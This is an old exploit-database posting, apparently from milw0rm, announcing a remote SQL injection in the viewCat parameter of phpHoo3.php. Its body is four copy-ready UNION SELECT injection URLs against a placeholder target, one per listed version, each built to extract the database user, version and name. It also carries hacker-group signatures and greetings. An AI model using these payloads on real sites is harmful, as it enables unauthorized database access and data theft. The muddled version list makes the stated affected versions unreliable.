############################################################### #################### Viva IslaM Viva IslaM #################### ## ## Remote SQL injection Vulnerability ## ## phpHoo3 V[ 4.4.8 - 4.3.9 - 4.3.10 - 5.2.6 -] ( phpHoo3.php viewCat ) ## ############################################################### ############################################################### ## ## AuTh0r : Mr.SQL ## ## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f ## ## Email : SQL@Hotmail.it ## ## SYRiAN Arab HACkErS ######################## ######################## ## ## -[[: Exploites for versions :]]- ## ## [[ V4.4.8 ]] www.Target.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,CONVERT(CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())+using+latin1),0,0,0,0,0-- ## [[ V4.3.9 ]] www.Target.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,user(),@@version,0,0,0,0,0-- ## [[ V4.3.10]] www.Target.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())-- ## [[ V5.2.6 ]] www.Target.com/phpHoo/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())-- ## ######################## ######################## ####################################################################################################### ####################################################################################################### -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: ####################################################################################################### ####################################################################################################### # milw0rm.com [2008-07-17]